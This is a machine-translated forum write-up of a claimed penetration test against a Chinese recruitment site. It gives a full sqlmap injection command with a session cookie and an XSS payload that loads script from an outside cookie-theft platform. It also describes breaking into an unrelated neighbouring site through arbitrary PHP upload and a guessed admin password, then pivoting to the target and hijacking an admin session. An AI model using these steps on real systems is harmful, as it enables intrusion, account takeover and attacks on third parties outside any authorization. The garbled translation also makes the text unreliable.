Authorization detection XX talent Network

Author: Liuker Original: http://www.anying.org/thread-88-1-1.html reprint must be noted.

0x1 Preface: I really don't know what to write. The current WEB penetration methods come and go. So I wrote an article using the latest project.

0x2
Because XX talent network was hacked, we asked our company for penetration testing. The vulnerability has been hacked several times, and the penetration is difficult.

0x3

Necessary information collection

IP: XXX. XX. XX. X
Port: 80
Script: php
In the linux + IIS 9.0 environment, what should be the strange linux + IIS environment? IIS9.0 is actually very simple. The so-called IIS9.0 is modified by apache.

The program is CWEBS, a set of paid programs

The target site has user registration and upload

0x4
Scan

Tool scan for http://www.xxxx.com/info.php
Obtain sensitive information, such as the absolute path of the website, and extract the information used in the article if not much information is written.
/Home/web0906p1/htdocs/info. php
The background address is http://www.xxxx.com/admin
Injection Point discovered
Http://www.xxxx.com /? Ctl = Query & act = File & typeid = 455
FCK editor exists
Http://www.xxxx.com/plus/FCKedit... nnectors/test.html #
58 neighboring stations are Cwebs

0x6
Detect and exploit existing vulnerabilities

The upload directory is found at the upload process. The user name is used as the upload directory.


/Upfiles/Person // 111.asp/ 40fe81afefd207b403e3c5acd3a0984c.jpg
Non-IIS 6.0 fruitless
Use payload of burpsuite to filter out PHP extensions. JSP cannot be executed

The FCK editor is changed to a white list.

The injection vulnerability is exploited as follows:
Python "C: \ Tools \ sqlmapgui \ sqlmap. py"-v 1 -- beep -- eta -- batch-u "http://www.xxxx.com /? Ctl = Query & act = File & typeid = 455 "-- level = 3 -- risk = 2 -- data =" XM = 1111 & SFZ = 1 "-- cookie =" PHPSESSID = 10f9b3c61c2cd1_a6fd28a42442221" -- dbms = mysql -- technique BEUST -- union-cols = 1-10 -- time-sec = 5 -- banner -- current-user -- current-db -- is-dba -- users -- dbs

Figure 1
Upload at the day before yesterday Download Attachment(46.25 KB)
Then the injection always prompts 403
Visual NFS Firewall

Then you can see an online consultation on the main site.
Figure 2

Upload at the day before yesterday Download Attachment(39.36 KB)
Then we found that XSS exists.
Insert Code
<Script src = "http://xssing.me/api1694"> </script> in title
Figure 3

Upload at the day before yesterday Download Attachment(31.3 KB)
Then wait for cookies

0x6

Cwebs

It took three hours to watch the site.

Www.1111.com
Any file can be uploaded if the website feedback is sent from the peer site.
Figure 4

Upload at the day before yesterday Download Attachment(63.71 KB)
Upload the PHP file to obtain the address.

Upload at the day before yesterday Download Attachment(31.56 KB)
Http://1111.com/tell/web_idea.ph... 540e581f720a2a0. php
It hurts
Download the file directly, but we can determine 00f3cf0b74840a2b3540e581f720a2a0. php is the file name.
Then find the path of some files on the website.
Egg
However, management also hurts.
Try to combine weak passwords using burpsuite
Directly 1111 1111 (1111 represents the domain name)
However, it hurts to enter the background.
Simple background
Upload at the day before yesterday Download Attachment(52.52 KB)
The background management does not support opera.
No IE6.0
Only element reviews can be obtained
Http://1111.com//admin/news/news_mng.php
News Management Interface
Click to modify a news article
Figure 7

Upload at the day before yesterday Download Attachment(76.63 KB)
You can upload any script on the frontend to see that the backend can be uploaded as needed.
Upload php to view the source code.
Http://1111.com/images/gist/20130305145927%0%.php
Figure 8

Upload at the day before yesterday Download Attachment(116.52 KB)
Then we can combine the path of the target station.
/Home/web0906p1/htdocs/info. php
Try cross-site
Success
Figure 9

Upload at the day before yesterday Download Attachment(82.93 KB)
Then, the cookies are logged on to the XSS platform.
Figure 10

Upload at the day before yesterday Download Attachment(44.5 KB)
Then, log on to the background.
Figure 11

Upload at the day before yesterday Download Attachment(47.79 KB)
So far, I am exhausted.